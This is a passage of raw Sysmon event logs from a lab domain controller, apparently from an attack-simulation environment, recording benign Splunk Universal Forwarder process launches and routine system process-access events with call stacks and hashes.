Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:16.584{08A6967A-4A38-6000-8E05-000000009A01}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:16.098{08A6967A-4A37-6000-8D05-000000009A01}53245316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:17.676{08A6967A-4A39-6000-8F05-000000009A01}18721352C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:17.520{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A39-6000-8F05-000000009A01}1872C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:17.520{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:17.520{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:17.520{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:17.520{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:17.520{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4A39-6000-8F05-000000009A01}1872C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:17.520{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A39-6000-8F05-000000009A01}1872C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:17.520{08A6967A-4A39-6000-8F05-000000009A01}1872C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.864{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A3A-6000-9105-000000009A01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.864{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.864{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.864{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.864{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.864{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4A3A-6000-9105-000000009A01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.864{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A3A-6000-9105-000000009A01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.864{08A6967A-4A3A-6000-9105-000000009A01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.348{08A6967A-4A3A-6000-9005-000000009A01}61366108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.192{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A3A-6000-9005-000000009A01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.192{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.192{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.192{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.192{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.192{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4A3A-6000-9005-000000009A01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.192{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A3A-6000-9005-000000009A01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:18.192{08A6967A-4A3A-6000-9005-000000009A01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:19.942{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A3B-6000-9205-000000009A01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 